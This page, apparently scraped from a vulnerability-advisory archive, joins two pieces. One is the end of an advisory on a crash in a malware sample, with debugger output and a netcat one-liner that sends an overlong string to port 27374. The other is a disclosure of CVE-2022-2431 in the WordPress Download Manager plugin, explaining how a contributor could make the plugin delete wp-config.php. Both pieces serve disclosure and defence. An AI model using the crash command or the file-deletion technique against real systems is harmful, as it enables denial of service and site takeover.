APPLICATION_FAULT_STACK_OVERFLOW_SOFTWARE_NX_FAULT_INVALID_EXPLOITABLE_FILL_PATTERN_41414141_STACKIMMUNE_BAD_IP_ywwqlwntubs.exe<br /><br />0:000> !exchain<br />000a1614: ntdll!ExecuteHandler2+44 (77729d70)<br />....<br />0019f2e4: 41414141<br />Invalid exception stack at 41414141<br /><br /><br />Exploit/PoC:<br />C:\>python -c "print('DOS'+'A'*804)" | nc64.exe x.x.x.x 27374<br />connected. 22:22 - August 1, 2022, Monday, ver: Legends 2.1<br /><br /><br />Disclaimer: The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information or exploits by the author or elsewhere. Do not attempt to download Malware samples. The author of this website takes no responsibility for any kind of damages occurring from improper Malware handling or the downloading of ANY Malware mentioned on this website or elsewhere. All content Copyright (c) Malvuln.com (TM).<br /></code></pre>
<pre><code>Description: Authenticated (Contributor+) Arbitrary File Deletion<br /><br />Affected Plugin: Download Manager<br /><br />Plugin Slug: download-manager<br /><br />Plugin Developer: W3 Eden, Inc.<br /><br />Affected Versions: <= 3.2.50<br /><br />CVE ID: CVE-2022-2431<br /><br />CVSS Score: 8.8 (High)<br /><br />CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H<br /><br />Researcher/s: Chloe Chamberland<br /><br />Fully Patched Version: 3.2.51<br /><br />Download Manager is a popular WordPress plugin designed to allow site content creators to share downloadable files that are stored as posts. These downloads can be displayed on the front-end of the WordPress site for users to download. Unfortunately, vulnerable versions of the plugin contain a bypass in how the downloadable file is stored and subsequently deleted upon post deletion that make it possible for attackers to delete arbitrary files on the server.<br /><br />More specifically, vulnerable versions of the plugin register the deleteFiles() function that is called via the before_delete_post hook. This hook is triggered right before a post has been deleted and its intended functionality in this case is to delete any files that may have been uploaded and associated with a “download” post.<br /><br />At first glance this looks like a relatively safe functionality assuming the originally supplied file path is validated. Unfortunately, however, that is not the case as the path to the file saved with the “download” post is not validated to ensure it was a safe file type or in a location associated with a “download” post. This means that a path to an arbitrary file with any extension can be supplied via the file[files][] parameter when saving a post and that would be the file associated with the “download” post. On many configurations an attacker could supply a path such as /var/www/html/wp-config.php that would associate the site’s WordPress configuration file with the download post.<br /><br />When the user goes to permanently delete the “download” post the deleteFiles() function will be triggered by the before_delete_post hook and the supplied file will be deleted, if it exists.<br /><br />This can be used by attackers to delete critical files hosted on the server. The wp-config.php file in particular is a popular target for attackers as deletion of this file would disconnect the existing database from the compromised site and allow the attacker to re-complete the initial installation process and connect their own database to the site. Once a database is connected, they would have access to the server and could upload arbitrary files to further infect the system.<br /><br />This vulnerability requires contributor-level access and above to exploit, so it serves as an important reminder to make sure you don’t provide contributor-level and above access to untrusted users. It’s also important to validate that all users have strong passwords to ensure your site won’t subsequently be compromised as a result of a vulnerability like this due to an unauthorized actor gaining access via a weak or compromised password.<br /><br />Timeline<br /><br />July 8, 2022 – Discovery of the Arbitrary File Deletion Vulnerability in the “Download Manager” plugin. A firewall rule is released to Wordfence Premium, Wordfence Care, and Wordfence Response users. We attempt to initiate contact with the developer.<br /><br />July 26, 2022 – After no response from the developer, we send the full disclosure details to the WordPress plugins team. They acknowledge the report and make contact with the developer.<br /><br />July 27, 2022. – A fully patched version of the plugin is released as version 3.2.51.<br /><br />August 7, 2022 – Wordfence free users receive the firewall rule.<br /><br />Conclusion<br /><br />In today’s post, we detailed a flaw in the “Download Manager” plugin that makes it possible for authenticated attackers to delete arbitrary files hosted on an affected server, which could lead to remote code execution and ultimately complete site compromise. This flaw has been fully patched in version 3.2.51.<br /><br />We recommend that WordPress site owners immediately verify that their site has been updated to the latest patched version available, which is version 3.2.53 at the time of this publication.<br /><br />Wordfence Premium, Wordfence Care, and Wordfence Response received a firewall rule on July 8, 2022 to provide protection against any attackers trying to exploit this vulnerability. Wordfence Free users will receive this same protection 30 days later on August 7, 2022.<br /><br />If you believe your site has been compromised as a result of this vulnerability or any other vulnerability, we offer Incident Response services via Wordfence Care.<br />If you need your site cleaned immediately, Wordfence Response offers the same service with 24/7/365 availability and a 1-hour response time. Both these products include hands-on support in case you need further assistance.<br /><br /></code></pre>